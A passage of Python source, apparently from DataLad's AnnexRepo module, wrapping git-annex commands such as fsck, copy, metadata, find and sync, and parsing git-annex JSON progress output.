If none is given, the\n default backend of this instance will be used.\n \"\"\"\n\n if self.is_direct_mode():\n raise CommandNotAvailableError(\n 'git-annex migrate',\n \"Command 'migrate' is not available in direct mode.\")\n self._call_annex(\n ['migrate'] + (['--backend', backend] if backend else []),\n files=files,\n )\n\n @classmethod\n def get_key_backend(cls, key):\n \"\"\"Get the backend from a given key\"\"\"\n return key.split('-', 1)[0]\n\n @normalize_paths\n def get_file_backend(self, files):\n \"\"\"Get the backend currently used for file(s).\n\n Parameters\n ----------\n files: list of str\n\n Returns\n -------\n list of str\n For each file in input list indicates the used backend by a str\n like \"SHA256E\" or \"MD5\".\n \"\"\"\n\n return [\n p.get('backend', '')\n for p in self.get_content_annexinfo(files, init=None).values()\n ]\n\n @property\n def default_backends(self):\n self.config.reload()\n # TODO: Deprecate and remove this property? It's used in the tests and\n # datalad-crawler.\n #\n # git-annex used to try the list of backends in annex.backends in\n # order. Now it takes annex.backend if set, falling back to the first\n # value of annex.backends. See 4c1e3210f (annex.backend is the new name\n # for what was annex.backends, 2017-05-09).\n backend = self.get_gitattributes('.')['.'].get(\n 'annex.backend',\n self.config.get(\"annex.backend\", default=None))\n if backend:\n return [backend]\n\n backends = self.config.get(\"annex.backends\", default=None)\n if backends:\n return backends.split()\n else:\n return None\n\n # comment out presently unnecessary functionality, bring back once needed\n #def fsck(self, paths=None, remote=None, fast=False, incremental=False,\n # limit=None, annex_options=None, git_options=None):\n def fsck(self, paths=None, remote=None, fast=False,\n annex_options=None, git_options=None):\n \"\"\"Front-end for git-annex fsck\n\n Parameters\n ----------\n paths : list\n Limit operation to specific paths.\n remote : str\n If given, the identified remote will be fsck'ed instead of the\n local repository.\n fast : bool\n If True, typically means that no actual content is being verified,\n but tests are limited to the presence of files.\n \"\"\"\n #incremental : bool or {'continue'} or SCHEDULE\n # If given, `fsck` is called with `--incremental`. If 'continue',\n # `fsck` is additionally called with `--more`, and any other argument\n # is given to `--incremental-schedule`.\n #limit : str or all\n # If the function `all` is given, `fsck` is called with `--all`. 
Any\n # other value is passed on to `--branch`.\n args = [] if annex_options is None else list(annex_options)\n if fast:\n args.append('--fast')\n if remote:\n args.append('--from={}'.format(remote))\n #if limit:\n # # looks funky, but really is a test if the `all` function was passed\n # # alternatives would have been 1) a dedicated argument (would need\n # # a check for mutual exclusivity with --branch), or 2) a str-type\n # # special values that has no meaning in Git and is less confusing\n # if limit is all:\n # args.append('--all')\n # else:\n # args.append('--branch={}'.format(limit))\n #if incremental == 'continue':\n # args.append('--more')\n #elif incremental:\n # args.append('--incremental')\n # if not (incremental is True):\n # args.append('--incremental-schedule={}'.format(incremental))\n try:\n return self._call_annex_records(\n ['fsck'] + args,\n files=paths,\n git_options=git_options,\n )\n except CommandError as e:\n # fsck may exit non-zero when there are too few known copies\n # callers of whereis are interested in exactly that information,\n # which we deliver via result, not via exception\n return e.kwargs.get('stdout_json', [])\n\n # We need --auto and --fast having exposed TODO\n @normalize_paths(match_return_type=False) # get a list even in case of a single item\n def copy_to(self, files, remote, options=None, jobs=None):\n \"\"\"Copy the actual content of `files` to `remote`\n\n Parameters\n ----------\n files: str or list of str\n path(s) to copy\n remote: str\n name of remote to copy `files` to\n\n Returns\n -------\n list of str\n files successfully copied\n \"\"\"\n warnings.warn(\n \"AnnexRepo.copy_to() is deprecated and will be removed in a \"\n \"future release. Use the Dataset method push() instead.\",\n DeprecationWarning)\n\n # find --in here --not --in remote\n # TODO: full support of annex copy options would lead to `files` being\n # optional. This means to check for whether files or certain options are\n # given and fail or just pass everything as is and try to figure out,\n # what was going on when catching CommandError\n\n if remote not in self.get_remotes():\n raise ValueError(\"Unknown remote '{0}'.\".format(remote))\n\n options = options[:] if options else []\n\n # Note:\n # In case of single path, 'annex copy' will fail, if it cannot copy it.\n # With multiple files, annex will just skip the ones, it cannot deal\n # with. We'll do the same and report back what was successful\n # (see return value).\n # Therefore raise telling exceptions before even calling annex:\n if len(files) == 1:\n # Note, that for isdir we actually need an absolute path (which we don't get via normalize_paths)\n if not isdir(opj(self.path, files[0])):\n # for non-existing paths, get_file_annexinfo() will raise already\n if self.get_file_annexinfo(files[0]).get('key') is None:\n raise FileInGitError(f'No known annex key for a file {files[0]}. 
Cannot copy')\n\n # TODO: RF -- logic is duplicated with get() -- the only difference\n # is the verb (copy, copy) or (get, put) and remote ('here', remote)?\n if '--key' not in options:\n expected_copys, copy_files = self._get_expected_files(\n files, ['--in', '.', '--not', '--in', remote])\n else:\n copy_files = files\n assert(len(files) == 1)\n expected_copys = {files[0]: AnnexRepo.get_size_from_key(files[0])}\n\n if not copy_files:\n lgr.debug(\"No files found needing copying.\")\n return []\n\n if len(copy_files) != len(files):\n lgr.debug(\"Actually copying %d files\", len(copy_files))\n\n self._maybe_open_ssh_connection(remote)\n annex_options = ['--to=%s' % remote]\n if options:\n annex_options.extend(split_cmdline(options))\n\n # filter out keys with missing size info\n total_nbytes = sum(i for i in expected_copys.values() if i) or None\n\n # TODO: provide more meaningful message (possibly aggregating 'note'\n # from annex failed ones\n results = self._call_annex_records(\n ['copy'] + annex_options,\n files=files, # copy_files,\n jobs=jobs,\n progress=True,\n total_nbytes=total_nbytes,\n )\n results_list = list(results)\n # XXX this is the only logic different ATM from get\n # check if any transfer failed since then we should just raise an Exception\n # for now to guarantee consistent behavior with non--json output\n # see https://github.com/datalad/datalad/pull/1349#discussion_r103639456\n from operator import itemgetter\n failed_copies = [e['file'] for e in results_list if not e['success']]\n good_copies = [\n e['file'] for e in results_list\n if e['success'] and\n e.get('note', '').startswith('to ') # transfer did happen\n ]\n if failed_copies:\n # TODO: RF for new fancy scheme of outputs reporting\n raise IncompleteResultsError(\n results=good_copies, failed=failed_copies,\n msg=\"Failed to copy %d file(s)\" % len(failed_copies))\n return good_copies\n\n @property\n def uuid(self):\n \"\"\"Annex UUID\n\n Returns\n -------\n str\n Returns a the annex UUID, if there is any, or `None` otherwise.\n \"\"\"\n if not self._uuid:\n self._uuid = self.config.get('annex.uuid', default=None)\n return self._uuid\n\n def get_description(self, uuid=None):\n \"\"\"Get annex repository description\n\n Parameters\n ----------\n uuid : str, optional\n For which remote (based on uuid) to report description for\n\n Returns\n -------\n str or None\n None returned if not found\n \"\"\"\n info = self.repo_info(fast=True)\n match = \\\n (lambda x: x['here']) \\\n if uuid is None \\\n else (lambda x: x['uuid'] == uuid)\n\n matches = list(set(chain.from_iterable(\n [\n [r['description'] for r in remotes if match(r)]\n for k, remotes in info.items()\n if k.endswith(' repositories')\n ]\n )))\n\n if len(matches) == 1:\n # single hit as it should\n return matches[0]\n elif len(matches) == 2:\n lgr.warning(\n \"Found multiple hits while searching. Returning first among: %s\",\n str(matches)\n )\n return matches[0]\n else:\n return None\n\n def get_metadata(self, files, timestamps=False, batch=False):\n \"\"\"Query git-annex file metadata\n\n Parameters\n ----------\n files : str or iterable(str)\n One or more paths for which metadata is to be queried. If one\n or more paths could be directories, `batch=False` must be given\n to prevent git-annex given an error. 
Due to technical limitations,\n such error will lead to a hanging process.\n timestamps: bool, optional\n If True, the output contains a '<metadatakey>-lastchanged'\n key for every metadata item, reflecting the modification\n time, as well as a 'lastchanged' key with the most recent\n modification time of any metadata item.\n batch: bool, optional\n If True, a `metadata --batch` process will be used, and only\n confirmed annex'ed files can be queried (else query will hang\n indefinitely). If False, invokes without --batch, and gives all files\n as arguments (this can be problematic with a large number of files).\n\n Returns\n -------\n generator\n One tuple per file (could be more items than input arguments\n when directories are given). First tuple item is the filename,\n second item is a dictionary with metadata key/value pairs. Note that annex\n metadata tags are stored under the key 'tag', which is a\n regular metadata item that can be manipulated like any other.\n \"\"\"\n def _format_response(res):\n return (\n str(Path(PurePosixPath(res['file']))),\n res['fields'] if timestamps else \\\n {k: v for k, v in res['fields'].items()\n if not k.endswith('lastchanged')}\n )\n\n if not files:\n return\n if batch is False:\n # we can be lazy\n files = ensure_list(files)\n else:\n if isinstance(files, str):\n files = [files]\n # anything else is assumed to be an iterable (e.g. a generator)\n if batch is False:\n for res in self.call_annex_records(['metadata'], files=files):\n yield _format_response(res)\n else:\n # batch mode is different: we need to compose a JSON request object\n batched = self._batched.get('metadata', json=True, path=self.path)\n for f in files:\n res = batched.proc1(json.dumps({'file': f}))\n yield _format_response(res)\n\n def set_metadata(\n self, files, reset=None, add=None, init=None,\n remove=None, purge=None, recursive=False):\n \"\"\"Manipulate git-annex file-metadata\n\n Parameters\n ----------\n files : str or list(str)\n One or more paths for which metadata is to be manipulated.\n The changes applied to each file item are uniform. However,\n the result may not be uniform across files, depending on the\n actual operation.\n reset : dict, optional\n Metadata items matching keys in the given dict are (re)set\n to the respective values.\n add : dict, optional\n The values of matching keys in the given dict appended to\n any possibly existing values. 
The metadata keys need not\n necessarily exist before.\n init : dict, optional\n Metadata items for the keys in the given dict are set\n to the respective values, if the key is not yet present\n in a file's metadata.\n remove : dict, optional\n Values in the given dict are removed from the metadata items\n matching the respective key, if they exist in a file's metadata.\n Non-existing values, or keys do not lead to failure.\n purge : list, optional\n Any metadata item with a key matching an entry in the given\n list is removed from the metadata.\n recursive : bool, optional\n If False, fail (with CommandError) when directory paths\n are given as `files`.\n\n Returns\n -------\n list\n JSON obj per modified file\n \"\"\"\n return list(self.set_metadata_(\n files, reset=reset, add=add, init=init,\n remove=remove, purge=purge, recursive=recursive))\n\n def set_metadata_(\n self, files, reset=None, add=None, init=None,\n remove=None, purge=None, recursive=False):\n \"\"\"Like set_metadata() but returns a generator\"\"\"\n\n def _genspec(expr, d):\n return [expr.format(k, v) for k, vs in d.items() for v in ensure_list(vs)]\n\n args = []\n spec = []\n for expr, d in (('{}={}', reset),\n ('{}+={}', add),\n ('{}?={}', init),\n ('{}-={}', remove)):\n if d:\n spec.extend(_genspec(expr, d))\n # prefix all with '-s' and extend arg list\n args.extend(j for i in zip(['-s'] * len(spec), spec) for j in i)\n if purge:\n # and all '-r' args\n args.extend(j for i in zip(['-r'] * len(purge), purge)\n for j in i)\n if not args:\n return\n\n if recursive:\n args.append('--force')\n\n # Make sure that batch add/addurl operations are closed so that we can\n # operate on files that were just added.\n self.precommit()\n\n for jsn in self.call_annex_records(\n ['metadata'] + args,\n files=files):\n yield jsn\n\n # TODO: RM DIRECT? might remain useful to detect submods left in direct mode\n @staticmethod\n def _is_annex_work_tree_message(out):\n return re.match(\n r'.*This operation must be run in a work tree.*'\n r'git status.*failed in submodule',\n out,\n re.MULTILINE | re.DOTALL | re.IGNORECASE)\n\n\n def _mark_content_availability(self, info):\n objectstore = self.pathobj.joinpath(\n self.path, GitRepo.get_git_dir(self), 'annex', 'objects')\n for f, r in info.items():\n if 'key' not in r or 'has_content' in r:\n # not annexed or already processed\n continue\n # test hashdirmixed first, as it is used in non-bare repos\n # which be a more frequent target\n # TODO optimize order based on some check that reveals\n # what scheme is used in a given annex\n r['has_content'] = False\n # some keys like URL-s700145--https://arxiv.org/pdf/0904.3664v1.pdf\n # require sanitization to be able to mark content availability\n # correctly. 
Can't limit to URL backend only; custom key backends\n # may need it, too\n key = _sanitize_key(r['key'])\n for testpath in (\n # ATM git-annex reports hashdir in native path\n # conventions and the actual file path `f` in\n # POSIX, weird...\n # we need to test for the actual key file, not\n # just the containing dir, as on windows the latter\n # may not always get cleaned up on `drop`\n objectstore.joinpath(\n ut.Path(r['hashdirmixed']), key, key),\n objectstore.joinpath(\n ut.Path(r['hashdirlower']), key, key)):\n if testpath.exists():\n r.pop('hashdirlower', None)\n r.pop('hashdirmixed', None)\n r['objloc'] = str(testpath)\n r['has_content'] = True\n break\n\n def get_file_annexinfo(self, path, ref=None, eval_availability=False,\n key_prefix=''):\n \"\"\"Query annex properties for a single file\n\n This is the companion to get_content_annexinfo() and offers\n simplified usage for single-file queries (the result lookup\n based on a path is not necessary.\n\n All keyword arguments have identical names and semantics as\n their get_content_annexinfo() counterparts. See their\n documentation for more information.\n\n Parameters\n ----------\n path : Path or str\n A single path to a file in the repository.\n\n Returns\n -------\n dict\n Keys and values match the values returned by get_content_annexinfo().\n If a file has no annex properties (i.e., a file that is directly\n checked into Git and is not annexed), the returned dictionary is\n empty.\n\n Raises\n ------\n ValueError\n When a given path is not matching a single file, but resolves to\n multiple files (e.g. a directory path)\n NoSuchPathError\n When the given path does not match any file in a repository\n \"\"\"\n info = {k: v\n for k, v in self.get_content_annexinfo(\n [path],\n init=None,\n ref=ref,\n eval_availability=eval_availability).items()}\n if len(info) > 1:\n raise ValueError(\n \"AnnexRepo.get_file_annexinfo() can handle handle a single \"\n f\"file path, but {path} resolved to {len(info)} paths\")\n elif not info:\n # no error, there is a file, but we know nothing about it\n return {}\n path, props = info.popitem()\n # turn a file not found situation into an exception\n if props.get('success') is False and props.get('note') == 'not found':\n raise NoSuchPathError(path)\n # fold path into the report to give easy access to a normalized,\n # resolved Path instance\n props['path'] = path\n return props\n\n def get_content_annexinfo(\n self, paths=None, init='git', ref=None, eval_availability=False,\n key_prefix='', **kwargs):\n \"\"\"\n Parameters\n ----------\n paths : list or None\n Specific paths to query info for. In `None`, info is reported for all\n content.\n init : 'git' or dict-like or None\n If set to 'git' annex content info will amend the output of\n GitRepo.get_content_info(), otherwise the dict-like object\n supplied will receive this information and the present keys will\n limit the report of annex properties. 
Alternatively, if `None`\n is given, no initialization is done, and no limit is in effect.\n ref : gitref or None\n If not None, annex content info for this Git reference will be\n produced, otherwise for the content of the present worktree.\n eval_availability : bool\n If this flag is given, evaluate whether the content of any annex'ed\n file is present in the local annex.\n **kwargs :\n Additional arguments for GitRepo.get_content_info(), if `init` is\n set to 'git'.\n\n Returns\n -------\n dict\n The keys/values match those reported by GitRepo.get_content_info().\n In addition, the following properties are added to each value\n dictionary:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory', where 'file'\n is also used for annex'ed files (corrects a 'symlink' report\n made by `get_content_info()`.\n `key`\n Annex key of a file (if an annex'ed file)\n `bytesize`\n Size of an annexed file in bytes.\n `has_content`\n Bool whether a content object for this key exists in the local\n annex (with `eval_availability`)\n `objloc`\n pathlib.Path of the content object in the local annex, if one\n is available (with `eval_availability`)\n \"\"\"\n if init is None:\n info = dict()\n elif init == 'git':\n info = super(AnnexRepo, self).get_content_info(\n paths=paths, ref=ref, **kwargs)\n else:\n info = init\n\n if not paths and paths is not None:\n return info\n\n # use this funny-looking option with both find and findref\n # it takes care of git-annex reporting on any known key, regardless\n # of whether or not it actually (did) exist in the local annex.\n if self._check_version_kludges(\"find-supports-anything\"):\n cmd = ['--anything']\n else:\n # --include=* was recommended by Joey in\n # https://git-annex.branchable.com/todo/add_--all___40__or_alike__41___to_find_and_findref/\n cmd = ['--include=*']\n files = None\n if ref:\n cmd = ['findref'] + cmd\n cmd.append(ref)\n else:\n cmd = ['find'] + cmd\n # stringify any pathobjs\n if paths: # we have early exit above in case of [] and not None\n files = [str(p) for p in paths]\n else:\n cmd += ['--include', '*']\n\n for j in self.call_annex_records(cmd, files=files):\n path = self.pathobj.joinpath(ut.PurePosixPath(j['file']))\n rec = info.get(path, None)\n if rec is None:\n # git didn't report on this path\n if j.get('success', None) is False:\n # Annex reports error on that file. Create an error entry,\n # as we can't currently yield a prepared error result from\n # within here.\n rec = {'status': 'error', 'state': 'unknown'}\n elif init is not None:\n # init constraint knows nothing about this path -> skip\n continue\n else:\n rec = {}\n rec.update({'{}{}'.format(key_prefix, k): j[k]\n for k in j if k != 'file' and k != 'error-messages'})\n # change annex' `error-messages` into singular to match result\n # records:\n if j.get('error-messages', None):\n rec['error_message'] = '\\n'.join(m.strip() for m in j['error-messages'])\n if 'bytesize' in rec:\n # it makes sense to make this an int that one can calculate with\n # with\n try:\n rec['bytesize'] = int(rec['bytesize'])\n except ValueError:\n # this would only ever happen, if the recorded key itself\n # has no size info. 
Even for a URL key, this would mean\n # that the server would have to not report size info at all\n # but it does actually happen, e.g.\n # URL--http&c%%ciml.info%dl%v0_9%ciml-v0_9-all.pdf\n # from github.com/datalad-datasets/machinelearning-books\n lgr.debug('Failed to convert \"%s\" to integer bytesize',\n rec['bytesize'])\n # remove the field completely to avoid ambiguous semantics\n # of None/NaN etc.\n del rec['bytesize']\n if rec.get('type') == 'symlink' and rec.get('key') is not None:\n # we have a tracked symlink with an associated annex key\n # this is only a symlink for technical reasons, but actually\n # a file from the user perspective.\n # homogenization of this kind makes the report more robust\n # across different representations of a repo\n # (think adjusted branches ...)\n rec['type'] = 'file'\n info[path] = rec\n # TODO make annex availability checks optional and move in here\n if eval_availability:\n self._mark_content_availability(info)\n return info\n\n def annexstatus(self, paths=None, untracked='all'):\n \"\"\"\n .. deprecated:: 0.16\n Use get_content_annexinfo() or the test helper\n :py:func:`datalad.tests.utils_pytest.get_annexstatus` instead.\n \"\"\"\n info = self.get_content_annexinfo(\n paths=paths,\n eval_availability=False,\n init=self.get_content_annexinfo(\n paths=paths,\n ref='HEAD',\n eval_availability=False,\n init=self.status(\n paths=paths,\n eval_submodule_state='full')\n )\n )\n self._mark_content_availability(info)\n return info\n\n def _save_add(self, files, git=None, git_opts=None):\n \"\"\"Simple helper to add files in save()\"\"\"\n from datalad.interface.results import get_status_dict\n\n # alter default behavior of git-annex by considering dotfiles\n # too\n # however, this helper is controlled by save() which itself\n # operates on status() which itself honors .gitignore, so\n # there is a standard mechanism that is uniform between Git\n # Annex repos to decide on the behavior on a case-by-case\n # basis\n options = []\n # if None -- leave it to annex to decide\n if git is False:\n options.append(\"--force-large\")\n if on_windows:\n # git-annex ignores symlinks on windows\n # https://github.com/datalad/datalad/issues/2955\n # check if there are any and pass them to git-add\n symlinks_toadd = {\n p: props for p, props in files.items()\n if props.get('type', None) == 'symlink'}\n if symlinks_toadd:\n for r in GitRepo._save_add(\n self,\n symlinks_toadd,\n git_opts=git_opts):\n yield r\n # trim `files` of symlinks\n files = {\n p: props for p, props in files.items()\n if props.get('type', None) != 'symlink'}\n\n expected_additions = None\n if ui.is_interactive:\n # without an interactive UI there is little benefit from\n # progressbar info, hence save the stat calls\n expected_additions = {p: self.get_file_size(p) for p in files}\n\n if git is True:\n yield from GitRepo._save_add(self, files, git_opts=git_opts)\n else:\n for r in self._call_annex_records(\n ['add'] + options,\n files=list(files.keys()),\n # TODO\n jobs=None,\n total_nbytes=sum(expected_additions.values())\n if expected_additions else None):\n yield get_status_dict(\n action=r.get('command', 'add'),\n refds=self.pathobj,\n type='file',\n path=(self.pathobj / ut.PurePosixPath(r['file']))\n if 'file' in r else None,\n status='ok' if r.get('success', None) else 'error',\n key=r.get('key', None),\n message='\\n'.join(r['error-messages'])\n if 'error-messages' in r else None,\n logger=lgr)\n\n def _save_post(self, message, files, partial_commit,\n amend=False, allow_empty=False):\n\n 
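"""Commit staged changes and then synchronize managed branches.\n\n        Descriptive docstring added by the editor, summarizing the existing code\n        below: this extends GitRepo._save_post() by syncing git-annex managed\n        branches after the commit, and by handling `amend` on an adjusted\n        branch, where the amendment is redone on the corresponding branch\n        instead of the adjusted one (see adjust_amend handling).\n        """\n\n        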
if amend and self.is_managed_branch() and \\\n self.format_commit(\"%B\").strip() == \"git-annex adjusted branch\":\n # We must not directly amend on an adjusted branch, but fix it\n # up after the fact. That is if HEAD is a git-annex commit.\n # Otherwise we still can amend-commit normally.\n # Note, that this may involve creating an empty commit first.\n amend = False\n adjust_amend = True\n else:\n adjust_amend = False\n\n # first do standard GitRepo business\n super(AnnexRepo, self)._save_post(\n message, files, partial_commit, amend,\n allow_empty=allow_empty or adjust_amend)\n # then sync potential managed branches\n self.localsync(managed_only=True)\n if adjust_amend:\n # We committed in an adjusted branch, but the goal is to amend in\n # corresponding branch.\n\n adjusted_branch = self.get_active_branch()\n corresponding_branch = self.get_corresponding_branch()\n old_sha = self.get_hexsha(corresponding_branch)\n\n org_commit_pointer = corresponding_branch + \"~1\"\n author_name, author_email, author_date, \\\n old_parent, old_message = self.format_commit(\n \"%an%x00%ae%x00%ad%x00%P%x00%B\", org_commit_pointer).split('\\0')\n new_env = (self._git_runner.env\n if self._git_runner.env else os.environ).copy()\n # `message` might be empty - we need to take it from the to be\n # amended commit in that case:\n msg = message or old_message\n new_env.update({\n 'GIT_AUTHOR_NAME': author_name,\n 'GIT_AUTHOR_EMAIL': author_email,\n 'GIT_AUTHOR_DATE': author_date\n })\n commit_cmd = [\"commit-tree\",\n corresponding_branch + \"^{tree}\",\n \"-m\", msg]\n if old_parent:\n commit_cmd.extend([\"-p\", old_parent])\n out, _ = self._call_git(commit_cmd, env=new_env, read_only=False)\n new_sha = out.strip()\n\n self.update_ref(\"refs/heads/\" + corresponding_branch,\n new_sha, old_sha)\n self.update_ref(\"refs/basis/\" + adjusted_branch,\n new_sha, old_sha)\n self.localsync(managed_only=True)\n\n def localsync(self, remote=None, managed_only=False):\n \"\"\"Consolidate the local git-annex branch and/or managed branches.\n\n This method calls `git annex sync` to perform purely local operations\n that:\n\n 1. Update the corresponding branch of any managed branch.\n\n 2. Synchronize the local 'git-annex' branch with respect to particular\n or all remotes (as currently reflected in the local state of their\n remote 'git-annex' branches).\n\n If a repository has git-annex's 'synced/...' branches these will be\n updated. Otherwise, such branches that are created by `git annex sync`\n are removed again after the sync is complete.\n\n Parameters\n ----------\n remote : str or list, optional\n If given, specifies the name of one or more remotes to sync against.\n If not given, all remotes are considered.\n managed_only : bool, optional\n Only perform a sync if a managed branch with a corresponding branch\n is detected. 
By default, a sync is always performed.\n \"\"\"\n branch = self.get_active_branch()\n corresponding_branch = self.get_corresponding_branch(branch)\n branch = corresponding_branch or branch\n\n if managed_only and not corresponding_branch:\n lgr.debug('No sync necessary, no corresponding branch detected')\n return\n\n lgr.debug(\n \"Sync local 'git-annex' branch%s.\",\n \", and corresponding '{}' branch\".format(corresponding_branch)\n if corresponding_branch else '')\n\n synced_branch = 'synced/{}'.format(branch)\n had_synced_branch = synced_branch in self.get_branches()\n cmd = ['sync']\n if remote:\n cmd.extend(ensure_list(remote))\n cmd.extend([\n # disable any external interaction and other magic\n '--no-push', '--no-pull', '--no-commit', '--no-resolvemerge',\n '--no-content'])\n self.call_annex(cmd)\n # a sync can establish new config (e.g. annex-uuid for a remote)\n self.config.reload()\n # cleanup sync'ed branch if we caused it\n if not had_synced_branch and synced_branch in self.get_branches():\n lgr.debug('Remove previously non-existent %s branch after sync',\n synced_branch)\n self.call_git(\n ['branch', '-d', synced_branch],\n )\n\n\nclass AnnexJsonProtocol(WitlessProtocol):\n \"\"\"Subprocess communication protocol for `annex ... --json` commands\n\n Importantly, parsed JSON content is returned as a result, not string output.\n\n This protocol also handles git-annex's JSON-style progress reporting.\n \"\"\"\n # capture both streams and handle messaging completely\n proc_out = True\n proc_err = True\n\n def __init__(self, done_future=None, total_nbytes=None):\n if done_future is not None:\n warnings.warn(\"`done_future` argument is ignored \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n super().__init__()\n # to collect parsed JSON command output\n self.json_out = []\n self._global_pbar_id = 'annexprogress-{}'.format(id(self))\n self.total_nbytes = total_nbytes\n self._unprocessed = None\n\n def add_to_output(self, json_object):\n self.json_out.append(json_object)\n\n def connection_made(self, transport):\n super().connection_made(transport)\n self._pbars = set()\n # overall counter of processed bytes (computed from key reports)\n self._byte_count = 0\n if self.total_nbytes:\n # init global pbar, do here to be on top of first file\n log_progress(\n lgr.info,\n self._global_pbar_id,\n 'Start annex operation',\n # do not crash if no command is reported\n unit=' Bytes',\n label='Total',\n total=self.total_nbytes,\n noninteractive_level=5,\n )\n self._pbars.add(self._global_pbar_id)\n\n def pipe_data_received(self, fd, data):\n if fd != 1:\n # let the base class decide what to do with it\n super().pipe_data_received(fd, data)\n return\n if self._unprocessed:\n data = self._unprocessed + data\n self._unprocessed = None\n # this is where the JSON records come in\n lines = data.splitlines()\n data_ends_with_eol = data.endswith(os.linesep.encode())\n del data\n for iline, line in enumerate(lines):\n try:\n j = json.loads(line)\n except Exception as exc:\n if line.strip():\n # do not complain on empty lines\n if iline == len(lines) - 1 and not data_ends_with_eol:\n lgr.debug(\"Caught %s while trying to parse JSON line %s which might \"\n \"be not yet a full line\", exc, line)\n # it is the last line and fails to parse -- it can/likely\n # to happen that it was not a complete line and that buffer\n # got filled up/provided before the end of line.\n # Store it so that it can be prepended to data in the next call.\n self._unprocessed = line\n break\n # TODO turn 
this into an error result, or put the exception\n # onto the result future -- needs more thought\n lgr.error('Received undecodable JSON output: %s', line)\n continue\n self._proc_json_record(j)\n\n def _get_pbar_id(self, record):\n # NOTE: Look at the \"action\" field for byte-progress records and the\n # top-level `record` for the final record. The action record as a whole\n # should be stable link across byte-progress records, but a subset of\n # the keys is hard coded below so that the action record can be linked\n # to the final one.\n info = record.get(\"action\") or record\n return 'annexprogress-{}-{}'.format(\n id(self),\n hash(frozenset((k, info.get(k))\n for k in [\"command\", \"key\", \"file\"])))\n\n def _get_pbar_label(self, action):\n # do not crash if no command is reported\n label = action.get('command', '').capitalize()\n target = action.get('file') or action.get('key')\n if target:\n label += \" \" + target\n\n if label:\n from datalad.ui import utils as ui_utils\n\n # Reserving 55 characters for the progress bar is based\n # approximately off what used to be done in the now-removed\n # (948ccf3e18) ProcessAnnexProgressIndicators.\n max_label_width = ui_utils.get_console_width() - 55\n if max_label_width < 0:\n # We're squeezed. Just show bar.\n label = \"\"\n elif len(label) > max_label_width:\n mid = max_label_width // 2\n label = label[:mid] + \" .. \" + label[-mid:]\n return label\n\n def _proc_json_record(self, j):\n # check for progress reports and act on them immediately\n # but only if there is something to build a progress report from\n pbar_id = self._get_pbar_id(j)\n known_pbar = pbar_id in self._pbars\n action = j.get('action')\n\n is_progress = action and 'byte-progress' in j\n # ignore errors repeatedly reported in progress messages. Final message\n # will contain them\n if action and not is_progress:\n for err_msg in action.pop('error-messages', []):\n lgr.error(err_msg)\n\n if known_pbar and (not is_progress or\n j.get('byte-progress') == j.get('total-size')):\n # take a known pbar down, completion or broken report\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished annex action: {}'.format(action),\n noninteractive_level=5,\n )\n self._pbars.discard(pbar_id)\n if is_progress:\n # The final record is yet to come.\n return\n\n if is_progress:\n if not known_pbar:\n # init the pbar, the is some progress left to be made\n # worth it\n log_progress(\n lgr.info,\n pbar_id,\n 'Start annex action: {}'.format(action),\n label=self._get_pbar_label(action),\n unit=' Bytes',\n total=float(j.get('total-size', 0)),\n noninteractive_level=5,\n )\n self._pbars.add(pbar_id)\n log_progress(\n lgr.info,\n pbar_id,\n j.get('percent-progress', 0),\n update=float(j.get('byte-progress', 0)),\n noninteractive_level=5,\n )\n # do not let progress reports leak into the return value\n return\n # update overall progress, do not crash when there is no key property\n # in the report (although there should be one)\n key_bytes = AnnexRepo.get_size_from_key(j.get('key', None))\n if key_bytes:\n self._byte_count += key_bytes\n # don't do anything to the results for now in terms of normalization\n # TODO the protocol could be made aware of the runner's CWD and\n # also any dataset the annex command is operating on. 
This would\n # enable 'file' property conversion to absolute paths\n self.add_to_output(j)\n\n if self.total_nbytes:\n if self.total_nbytes <= self._byte_count:\n # discard global pbar\n log_progress(\n lgr.info,\n self._global_pbar_id,\n 'Finished annex {}'.format(j.get('command', '')),\n noninteractive_level=5,\n )\n self._pbars.discard(self._global_pbar_id)\n else:\n # log actual progress\n log_progress(\n lgr.info,\n self._global_pbar_id,\n j.get('file', ''),\n update=self._byte_count,\n noninteractive_level=5,\n )\n\n def _prepare_result(self):\n # first let the base class do its thing\n results = super()._prepare_result()\n # now amend the results, make clear in the key-name that these records\n # came from stdout -- may not be important here or now, but it is easy\n # to imagine structured output on stderr at some point\n results['stdout_json'] = self.json_out\n return results\n\n def process_exited(self):\n # take down any progress bars that were not closed orderly\n for pbar_id in self._pbars:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished',\n noninteractive_level=5,\n )\n if self._unprocessed:\n lgr.error(\n \"%d bytes of received undecodable JSON output remain: %s\",\n len(self._unprocessed), self._unprocessed\n )\n super().process_exited()\n\n\nclass GeneratorAnnexJsonProtocol(GeneratorMixIn, AnnexJsonProtocol):\n def __init__(self,\n done_future=None,\n total_nbytes=None):\n GeneratorMixIn.__init__(self)\n AnnexJsonProtocol.__init__(self, done_future, total_nbytes)\n\n def add_to_output(self, json_object):\n self.send_result(json_object)\n\n\nclass GeneratorAnnexJsonNoStderrProtocol(GeneratorAnnexJsonProtocol):\n def __init__(self,\n done_future=None,\n total_nbytes=None):\n GeneratorMixIn.__init__(self)\n AnnexJsonProtocol.__init__(self, done_future, total_nbytes)\n self.stderr_output = bytearray()\n\n def pipe_data_received(self, fd, data):\n if fd == 2:\n self.stderr_output += data\n # let the base class decide what to do with it\n super().pipe_data_received(fd, data)\n\n def process_exited(self):\n super().process_exited()\n if self.stderr_output:\n raise CommandError(\n msg=\"Unexpected stderr output\",\n stderr=self.stderr_output.decode())\n\n\nclass AnnexInitOutput(WitlessProtocol, AssemblingDecoderMixIn):\n proc_out = True\n proc_err = True\n\n def __init__(self, done_future=None, encoding=None):\n WitlessProtocol.__init__(self, done_future, encoding)\n AssemblingDecoderMixIn.__init__(self)\n\n def pipe_data_received(self, fd, byts):\n line = self.decode(fd, byts, self.encoding)\n if fd == 1:\n res = re.search(\"(scanning for .* files)\", line, flags=re.IGNORECASE)\n if res:\n lgr.info(\"%s (this may take some time)\", res.groups()[0])\n elif fd == 2:\n lgr.info(line.strip())\n\n\n@auto_repr(short=False)\nclass BatchedAnnex(BatchedCommand):\n \"\"\"Container for an annex process which would allow for persistent communication\n \"\"\"\n\n def __init__(self, annex_cmd, git_options=None, annex_options=None, path=None,\n json=False, output_proc=None, batch_opt='--batch'):\n if not isinstance(annex_cmd, list):\n annex_cmd = [annex_cmd]\n cmd = \\\n ['git'] + \\\n (git_options if git_options else []) + \\\n ['annex'] + \\\n annex_cmd + \\\n (annex_options if annex_options else []) + \\\n 